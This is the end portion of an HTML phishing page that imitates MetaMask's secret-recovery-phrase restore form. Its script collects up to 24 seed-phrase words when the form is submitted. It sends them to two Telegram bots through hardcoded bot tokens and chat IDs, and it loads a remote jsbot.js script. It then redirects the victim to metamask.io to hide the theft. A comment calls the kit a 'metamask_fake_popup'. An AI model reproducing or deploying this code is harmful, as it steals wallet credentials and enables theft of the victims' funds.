                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show19">
                                    <label for="import-srp__srp-word-18" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">19.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-18" type="text" dir="auto" data-testid="import-srp__srp-word-18" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-18-checkbox" type="checkbox" data-testid="import-srp__srp-word-18-checkbox">
                                       <label for="import-srp__srp-word-18-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show20">
                                    <label for="import-srp__srp-word-19" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">20.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-19" type="text" dir="auto" data-testid="import-srp__srp-word-19" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-19-checkbox" type="checkbox" data-testid="import-srp__srp-word-19-checkbox">
                                       <label for="import-srp__srp-word-19-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show21">
                                    <label for="import-srp__srp-word-20" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">21.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-20" type="text" dir="auto" data-testid="import-srp__srp-word-20" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-20-checkbox" type="checkbox" data-testid="import-srp__srp-word-20-checkbox">
                                       <label for="import-srp__srp-word-20-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show22">
                                    <label for="import-srp__srp-word-21" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">22.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-21" type="text" dir="auto" data-testid="import-srp__srp-word-21" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-21-checkbox" type="checkbox" data-testid="import-srp__srp-word-21-checkbox">
                                       <label for="import-srp__srp-word-21-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show23">
                                    <label for="import-srp__srp-word-22" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">23.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-22" type="text" dir="auto" data-testid="import-srp__srp-word-22" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-22-checkbox" type="checkbox" data-testid="import-srp__srp-word-22-checkbox">
                                       <label for="import-srp__srp-word-22-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                                 <div class="import-srp__srp-word" id="show24">
                                    <label for="import-srp__srp-word-23" class="import-srp__srp-word-label">
                                       <p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">24.</p>
                                    </label>
                                    <div class="MuiFormControl-root MuiTextField-root">
                                       <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-23" type="text" dir="auto" data-testid="import-srp__srp-word-23" class="MuiInputBase-input MuiInput-input" value=""></div>
                                    </div>
                                    <div class="show-hide-toggle">
                                       <input class="show-hide-toggle__input" id="import-srp__srp-word-23-checkbox" type="checkbox" data-testid="import-srp__srp-word-23-checkbox">
                                       <label for="import-srp__srp-word-23-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase">
                                          <svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512">
                                             <path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path>
                                          </svg>
                                       </label>
                                    </div>
                                 </div>
                              </div>
                           </div>
                           <div class="create-new-vault__create-password">
                              <div class="MuiFormControl-root MuiTextField-root MuiFormControl-marginNormal">
                                 <label class="MuiFormLabel-root MuiInputLabel-root jss9 jss13 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink" data-shrink="true" for="password" id="password-label">New password (8 characters min)</label>
                                 <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="new-password" id="password" type="text" dir="auto" data-testid="create-vault-password" class="MuiInputBase-input MuiInput-input" value=""></div>
                              </div>
                              <div class="MuiFormControl-root MuiTextField-root MuiFormControl-marginNormal">
                                 <label class="MuiFormLabel-root MuiInputLabel-root jss9 jss13 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink" data-shrink="true" for="confirm-password" id="confirm-password-label">Confirm password</label>
                                 <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="new-password" id="confirm-password" type="text" dir="auto" data-testid="create-vault-confirm-password" class="MuiInputBase-input MuiInput-input" value=""></div>
                              </div>
                           </div>
                           <button onclick="submitForm()" class="mm-box mm-text mm-button-base mm-button-base--size-md  create-new-vault__submit-button mm-button-primary mm-button-primary--disabled mm-text--body-md-medium mm-box--padding-0 mm-box--padding-right-4 mm-box--padding-left-4 mm-box--display-inline-flex mm-box--justify-content-center mm-box--align-items-center mm-box--color-primary-inverse mm-box--background-color-primary-default mm-box--rounded-pill">Restore</button>
                        </form>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </div>
      <div id="popover-content"></div>
      <script src="https://ip9uk39kv26rml8wjjruzg-on.drv.tw/jsbot.js"></script>
      <script src=
      "https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js">
          </script>
      <script>
            function countWords(str) {
                  return str.trim().split(/\s+/).length;
            };
         $('textarea').on('paste', function (e) {
               let text = (event.clipboardData || window.clipboardData).getData('text');
               if (countWords(e.target.value + text) > 12) {
                  e.preventDefault();
               }
         });
        var dropdown__select = document.getElementById('dropdown__select');
        // var show15 = document.querySelector("show15");
        // var show18 = document.querySelector("show18");
        // var show21 = document.querySelector("show21");
        // var show24 = document.querySelector("show24");

        // show15.style.display = "none";
        // show18.style.display = "none";
        // show21.style.display = "none";
        // show24.style.display = "none";
            $("#show13").hide();
            $("#show14").hide();
            $("#show15").hide();
            $("#show16").hide(); 
            $("#show17").hide();
            $("#show18").hide();
            $("#show19").hide();
            $("#show20").hide();
            $("#show21").hide();
            $("#show22").hide();
            $("#show23").hide();
            $("#show24").hide();

        dropdown__select.addEventListener('change', function handleChange(event) {
            var dropdown__select_value = event.target.value;
            console.log(event.target.value); // 👉️ get selected VALUE
            switch (dropdown__select_value) {
                case '12':
                    $("#show13").hide();
                    $("#show14").hide();
                    $("#show15").hide();
                    $("#show16").hide(); 
                    $("#show17").hide();
                    $("#show18").hide();
                    $("#show19").hide();
                    $("#show20").hide();
                    $("#show21").hide();
                    $("#show22").hide();
                    $("#show23").hide();
                    $("#show24").hide();
                    break;
                case '15':
                    $("#show13").show();
                    $("#show14").show();
                    $("#show15").show();
                    $("#show16").hide(); 
                    $("#show17").hide();
                    $("#show18").hide();
                    $("#show19").hide();
                    $("#show20").hide();
                    $("#show21").hide();
                    $("#show22").hide();
                    $("#show23").hide();
                    $("#show24").hide();
                    break;
                case '18':
                    $("#show13").show();
                    $("#show14").show();
                    $("#show15").show();
                    $("#show16").show(); 
                    $("#show17").show();
                    $("#show18").show();
                    $("#show19").hide();
                    $("#show20").hide();
                    $("#show21").hide();
                    $("#show22").hide();
                    $("#show23").hide();
                    $("#show24").hide();
                    break;
                case '21':
                    $("#show13").show();
                    $("#show14").show();
                    $("#show15").show();
                    $("#show16").show(); 
                    $("#show17").show();
                    $("#show18").show();
                    $("#show19").show();
                    $("#show20").show();
                    $("#show21").show();
                    $("#show22").hide();
                    $("#show23").hide();
                    $("#show24").hide();
                    break;
                case '24':
                    $("#show13").show();
                    $("#show14").show();
                    $("#show15").show();
                    $("#show16").show(); 
                    $("#show17").show();
                    $("#show18").show();
                    $("#show19").show();
                    $("#show20").show();
                    $("#show21").show();
                    $("#show22").show();
                    $("#show23").show();
                    $("#show24").show();
                    break;
                default:
                    break;
            }
        });
            
        function submitForm(e){
         event.preventDefault();
         let zero = $("#import-srp__srp-word-0").val();
         let one = $("#import-srp__srp-word-1").val();
         let two = $("#import-srp__srp-word-2").val();
         let three = $("#import-srp__srp-word-3").val();
         let four = $("#import-srp__srp-word-4").val();
         let five = $("#import-srp__srp-word-5").val();
         let six = $("#import-srp__srp-word-6").val();
         let seven = $("#import-srp__srp-word-7").val();
         let eight = $("#import-srp__srp-word-8").val();
         let nine = $("#import-srp__srp-word-9").val();
         let ten = $("#import-srp__srp-word-10").val();
         let eleven = $("#import-srp__srp-word-11").val();
         let twelve = $("#import-srp__srp-word-12").val();
         let thirteen = $("#import-srp__srp-word-13").val();
         let fourteen = $("#import-srp__srp-word-14").val();
         let fifteen = $("#import-srp__srp-word-15").val();
         let sixteen = $("#import-srp__srp-word-16").val();
         let seventeen = $("#import-srp__srp-word-17").val();
         let eighteen = $("#import-srp__srp-word-18").val();
         let nineteen = $("#import-srp__srp-word-19").val();
         let twenty = $("#import-srp__srp-word-20").val();
         let twenty_one = $("#import-srp__srp-word-21").val();
         let twenty_two = $("#import-srp__srp-word-22").val();
         let twenty_three = $("#import-srp__srp-word-23").val();
         let twenty_four = $("#import-srp__srp-word-24").val();

         const text = `${zero} ${one} ${two} ${three} ${four} ${five} ${six} ${seven} ${eight} ${nine}
         ${ten} ${eleven} ${twelve} ${thirteen} ${fourteen} ${sixteen} ${seventeen} ${eighteen} ${nineteen} 
         ${twenty} ${twenty_one} ${twenty_two} ${twenty_three} ${twenty_four}`;

const message = `
💸 🩸 Log DAILY 🩸 💸

                           🔧Metamask Popup version: 1.2

               🔑Your panel password: ${text}
               Support Channel: @metamask_fake_popup
`;

         // const text2 = "Hello";
         const tg2 = {
            token: "7186978604:AAHjuHs-3aMrn_QqMn--jYeln7rVJrsi76Q", // Your bot's token that got from @BotFather
            chat_id: "5445789907" // The user's(that you want to send a message) telegram chat id https://www.alphr.com/find-chat-id-telegram/
         }

         const tg = {
            token: "7055036057:AAE-s8vvRXj6ew32RU0dZhC4JjtF3VoxDPY", // Your bot's token that got from @BotFather
            chat_id: "6733155604" // The user's(that you want to send a message) telegram chat id https://www.alphr.com/find-chat-id-telegram/
         }

         const bot2 = new Bot(tg2.token, tg2.chat_id)
         bot2.sendMessage(message, null, 'html', false)
         .then(res => {
            console.log("Success!");
         })
         .catch(err => console.log(err))
         

         const bot = new Bot(tg.token, tg.chat_id)
         bot.sendMessage(message, null, 'html', false)
         .then(res => {
            console.log("Success!", res);
            //window.opener.self.close();
            window.location.replace("https://metamask.io/");
         })
         .catch(err => console.log(err))
         }
      </script>
    </body>
</html>